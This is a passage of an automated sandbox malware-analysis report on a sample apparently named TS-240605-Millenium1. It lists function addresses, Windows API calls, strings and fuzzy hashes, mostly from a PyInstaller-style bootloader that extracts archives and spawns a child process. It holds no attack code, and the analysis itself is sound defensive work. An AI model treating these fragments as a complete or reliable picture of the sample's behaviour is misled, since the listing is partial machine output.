GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6CEB4705C), ref: 00007FF6CEB46E43

Strings

Eastern Summer Time, xrefs: 00007FF6CEB46F01
Eastern Standard Time, xrefs: 00007FF6CEB46EE9

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 2248164782-239921721
Opcode ID: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
Instruction ID: 4db8121a0f46287ed4929fc3b31b393909a4c929bbd47c8072d532601ad8cea9
Opcode Fuzzy Hash: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
Instruction Fuzzy Hash: C7517D32A1864386F724DF21EA911B9A774BF6A785F444136FACDE3A99DF3CE4408740

Function 00007FF6CEB29F3B Relevance: 4.1, Strings: 3, Instructions: 397COMMON

Download Yara Rule

Strings

unknown header flags set, xrefs: 00007FF6CEB29F85
header crc mismatch, xrefs: 00007FF6CEB2A3E1
, xrefs: 00007FF6CEB2A01B

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
Instruction ID: b572e1b2acb22f65a8ce4b1a20d0ff03dde23bffdedb956691341f65fe863de9
Opcode Fuzzy Hash: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
Instruction Fuzzy Hash: 5BF18372A183D64BE7958F14C28CA3E3AB9EF76745F064538EA89A7790CF38E544C740

Function 00007FF6CEB28D00 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6CEB28D31
FindClose.KERNELBASE ref: 00007FF6CEB28D40

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
Instruction ID: 01b4d53bc2fa9a94c3cf7c52613c0be143ece4e82bebe56359f828daf3876e9d
Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
Instruction Fuzzy Hash: 8DF08122A1878287F7A08F64E5897767360EB65765F04063AE6AD666D4DF3CE0088A00

Function 00007FF6CEB29D9B Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF6CEB29F22
invalid window size, xrefs: 00007FF6CEB29F09

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
Instruction ID: 73f9f9c2113f0ef0a546f35573f54dcc3921e4ac8b856cd9cd2ff12c95cf73c2
Opcode Fuzzy Hash: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
Instruction Fuzzy Hash: 8F91C472A182C687E7A58E14D58CB7E3AB9FF75341F115139EA9AA6790CF38E540CB00

Function 00007FF6CEB41720 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: b07a4aa98c3ea62428db7ff75e9c78d2acc70f0ed8e8990dbcc6d64e325556f5
Instruction ID: 1ccf345457a493c03fb61e28dd0893d0f59b125b629138fab5ec4cc8cb3587c8
Opcode Fuzzy Hash: b07a4aa98c3ea62428db7ff75e9c78d2acc70f0ed8e8990dbcc6d64e325556f5
Instruction Fuzzy Hash: 1E02B323E1D64641FE55AF21974127926B4AF23BA2F444636FEDDE73D2DE3CA402A310

Function 00007FF6CEB21700 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF6CEB218EC
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6CEB21856
Failed to create symbolic link %s!, xrefs: 00007FF6CEB21743
fseek, xrefs: 00007FF6CEB217FD
fopen, xrefs: 00007FF6CEB21787
malloc, xrefs: 00007FF6CEB2185D
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6CEB217C9
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6CEB218D5
Failed to extract %s: failed to open target file!, xrefs: 00007FF6CEB21780
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF6CEB21716
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6CEB217F6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6CEB218E5
fwrite, xrefs: 00007FF6CEB218DC

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: dd6ade43e75c03bffe1577d39ea6a44076d23661ebe81191c2522cbc4993ce90
Instruction ID: 99e6d6dc1a747d761f5e56cac2a463542b004365e77e08e9885f250a5a6d1b9a
Opcode Fuzzy Hash: dd6ade43e75c03bffe1577d39ea6a44076d23661ebe81191c2522cbc4993ce90
Instruction Fuzzy Hash: F9519E62B08A4292FA119F15E6482B963B1BF76BD2F444031FE8DEB6A5DF3CF5458700

Function 00007FF6CEB21A90 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6CEB284C0: _fread_nolock.LIBCMT ref: 00007FF6CEB2856A

_fread_nolock.LIBCMT ref: 00007FF6CEB21B44

Part of subcall function 00007FF6CEB22870: MessageBoxW.USER32 ref: 00007FF6CEB2297B

Strings

fread, xrefs: 00007FF6CEB21B56, 00007FF6CEB21C00
Could not allocate buffer for TOC!, xrefs: 00007FF6CEB21BC6
Failed to seek to cookie position!, xrefs: 00007FF6CEB21B1C
MEI, xrefs: 00007FF6CEB21AD2
Error on file., xrefs: 00007FF6CEB21C26
fseek, xrefs: 00007FF6CEB21B23
Failed to read cookie!, xrefs: 00007FF6CEB21B4F
malloc, xrefs: 00007FF6CEB21BCD
Could not read full TOC!, xrefs: 00007FF6CEB21BF9

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: f57c7b85b9d6d8ab6ed12c8726bb5d2e90ccc7f7b80064200947aedb9a24219d
Instruction ID: 7b81346371cb39f5964e53cfe087686f54bca7108c51b86d3a3019c1eb4a0b2e
Opcode Fuzzy Hash: f57c7b85b9d6d8ab6ed12c8726bb5d2e90ccc7f7b80064200947aedb9a24219d
Instruction Fuzzy Hash: BF51A172B09A4286EB14CF24D65917837B0EF6AB86F518136EA8CD7795DE3CE440CB44

Function 00007FF6CEB28290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF6CEB23D8D), ref: 00007FF6CEB282DF
GetStartupInfoW.KERNEL32 ref: 00007FF6CEB282FE

Part of subcall function 00007FF6CEB3B234: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB3B248

Part of subcall function 00007FF6CEB38E54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB38EBB

GetCommandLineW.KERNEL32 ref: 00007FF6CEB2839E
CreateProcessW.KERNELBASE ref: 00007FF6CEB283E0
WaitForSingleObject.KERNEL32 ref: 00007FF6CEB283F4
GetExitCodeProcess.KERNELBASE ref: 00007FF6CEB28404

Strings

CreateProcessW, xrefs: 00007FF6CEB28417
Error creating child process!, xrefs: 00007FF6CEB28410

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
Instruction ID: a255a4bac5b3d592e71e6d42f97646b905adcc9a9ffbcc3009d08bf2f32e4f5a
Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
Instruction Fuzzy Hash: 59413332A0878282EA209F64E5452BAB3A0FFA5765F400736F6ED977D9DF7CD0448B40

Function 00007FF6CEB21050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6CEB210F1
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6CEB210B4
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6CEB21249
1.3.1, xrefs: 00007FF6CEB2107E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6CEB2111F
malloc, xrefs: 00007FF6CEB210F8, 00007FF6CEB21126

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
Instruction ID: aea5955dba03efff4a575959e4fee0f31840001fa9602aa96380802c96fc277f
Opcode Fuzzy Hash: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
Instruction Fuzzy Hash: 8E51C323A0968281EA609F51A6443BA62B1FFB6B96F444131FECDE7785EF3CE545C700

Function 00007FF6CEB3F9C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6CEB3FD5A,?,?,-00000018,00007FF6CEB3BB0B,?,?,?,00007FF6CEB3BA02,?,?,?,00007FF6CEB3698E), ref: 00007FF6CEB3FB3C
GetProcAddress.KERNEL32(?,?,?,00007FF6CEB3FD5A,?,?,-00000018,00007FF6CEB3BB0B,?,?,?,00007FF6CEB3BA02,?,?,?,00007FF6CEB3698E), ref: 00007FF6CEB3FB48

Strings

ext-ms-, xrefs: 00007FF6CEB3FA99
api-ms-, xrefs: 00007FF6CEB3FA86

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
Instruction ID: 90f385a6179212c8a108cb8057248637f3b1e781b1fa05237503b5d116b6d39c
Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
Instruction Fuzzy Hash: 2B41E372B19A0342FA16DF16AA165B622B2BF26B91F0D4135ED8DE7794EF3CE4458300

Function 00007FF6CEB3C80C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB3CC39

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
Instruction ID: efb6f6ed2211424daceca624dedc6d77575e84e19d9e85652432a7aa37beb0bd
Opcode Fuzzy Hash: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
Instruction Fuzzy Hash: 63C1053290C68783EB218F9492422BD3775EBA2B82F594131FACD97395DE7CF8458B50

Function 00007FF6CEB28860 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6CEB28880
OpenProcessToken.ADVAPI32 ref: 00007FF6CEB28891
GetTokenInformation.KERNELBASE ref: 00007FF6CEB288B6
GetLastError.KERNEL32 ref: 00007FF6CEB288C0
GetTokenInformation.KERNELBASE ref: 00007FF6CEB28900
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6CEB2891C
CloseHandle.KERNEL32 ref: 00007FF6CEB28934

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
Instruction ID: 0dc714b531f1ecb78981178c131d1bd1174109ab4c1cad25d4075d89d0aa5602
Opcode Fuzzy Hash: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
Instruction Fuzzy Hash: 5E21553260C64282EB509F55F64413AA3B0FFA6BA1F101235FADD97BD8DF6CE4548B00

Function 00007FF6CEB28B80 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6CEB28860: GetCurrentProcess.KERNEL32 ref: 00007FF6CEB28880
Part of subcall function 00007FF6CEB28860: OpenProcessToken.ADVAPI32 ref: 00007FF6CEB28891
Part of subcall function 00007FF6CEB28860: GetTokenInformation.KERNELBASE ref: 00007FF6CEB288B6
Part of subcall function 00007FF6CEB28860: GetLastError.KERNEL32 ref: 00007FF6CEB288C0
Part of subcall function 00007FF6CEB28860: GetTokenInformation.KERNELBASE ref: 00007FF6CEB28900
Part of subcall function 00007FF6CEB28860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6CEB2891C
Part of subcall function 00007FF6CEB28860: CloseHandle.KERNEL32 ref: 00007FF6CEB28934

LocalFree.KERNEL32(00000000,00007FF6CEB23B4E), ref: 00007FF6CEB28C0C
LocalFree.KERNEL32 ref: 00007FF6CEB28C15

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6CEB28BE2
S-1-3-4, xrefs: 00007FF6CEB28BC1
D:(A;;FA;;;%s), xrefs: 00007FF6CEB28BF7
Security descriptor string length exceeds PATH_MAX!, xrefs: 00007FF6CEB28C23

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
API String ID: 6828938-1817031585
Opcode ID: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
Instruction ID: 9fd03ac04c53144e3619b47a23a519036be5534145cd228762cc6ff4a288bad4
Opcode Fuzzy Hash: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
Instruction Fuzzy Hash: E3216D32A1974781FA50AF20E6096F96270BF7A782F844532F9CDE7696DF3CE5058740

Function 00007FF6CEB23F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB23F34

Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0

Strings

GetModuleFileNameW, xrefs: 00007FF6CEB23F45
Failed to get executable path., xrefs: 00007FF6CEB23F3E
Failed to convert executable path to UTF-8., xrefs: 00007FF6CEB23F70

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
Instruction ID: 60ca6e15ca3426de3bfa22099994752fb04d4dee1b218f9e701946b285c2f2fa
Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
Instruction Fuzzy Hash: 4E117521B1958341FA25AF21FA193F65274AF7A7C6F440832F8CEE7699EE1CE1458704

Function 00007FF6CEB3DD10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6CEB3DCFB), ref: 00007FF6CEB3DE2C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6CEB3DCFB), ref: 00007FF6CEB3DEB7

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
